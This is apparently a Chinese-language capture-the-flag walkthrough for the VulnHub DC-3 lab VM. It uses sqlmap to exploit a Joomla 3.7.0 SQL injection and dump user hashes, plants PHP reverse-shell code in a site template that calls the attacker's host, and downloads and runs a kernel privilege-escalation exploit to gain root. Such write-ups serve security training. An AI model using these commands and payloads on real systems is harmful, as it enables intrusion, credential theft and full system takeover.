导语

https://www.vulnhub.com/entry/dc-32,312/

一个flag,冲!

步骤

靶机和kali都NAT在vmware了

虽然但是,ova里设置有一内内问题,根据提示修改一下设置

img

然后在就可以愉快的开干了

arp-scan

img

靶机为192.168.77.142

nmap看看

img

可以看到是80的http,并且是一个开源的框架Joomla,打开看看

img

用joomscan扫一下

img

可以看到是3.7.0版本,后台是adminstrator,没有内核漏洞

直接进行一个searchsploit

img

查看sploit

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

img

上sqlmap


sqlmap -u "http://192.168.77.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.77.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D 'joomladb' --tables
sqlmap -u "http://192.168.77.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D 'joomladb' -T '#__users' --columns
sqlmap -u "http://192.168.77.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D 'joomladb' -T '#__users' -C 'username,password' --dump

img

当问你是否用已有cookie是选默认y

img

当问你是否爆列名是选y而不要选默认的N

img

img

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

用johntheripper爆一下

img

密码是史努比,登录后台

img

经过一番寻找,我们发现extensions->template->template里能编辑模板,其中能往里面写任意的php代码,可以使用php反弹一个shell

# 当系统没有禁用proc_popen的时候,我们是可以借助proc_popen轻松反弹这样的一个shell的。
$sock = fsockopen("192.168.77.140", "5555");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

img

在kali监听5555端口

nc -lvvp 5555

成功连接,用python起一个tty,并且查看自己的id

img

获取了webshell,但是无法进入root的目录,所以现在想办法获取root,查看系统版本

img

ubuntu16.04,内核版本是4.4.0-21-generic

searchsploit看看

img

看看39772.txt(一般txt写的比较详细)

img

下载他的exp

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

然后在kali起个Apache,把exp放过去

sudo mv 39772.zip /var/www/html
systemctl start apache2.service

在webshell里wget

img

然后解压按照操作做就完事了

unzip 39772.zip
cd 39772.zip
tar -xvf exploit.tar
cd exploit
./compile.sh
./doubleput

img

有了root,进root,查看flag

img

参考

https://blog.csdn.net/a310034188/article/details/122709729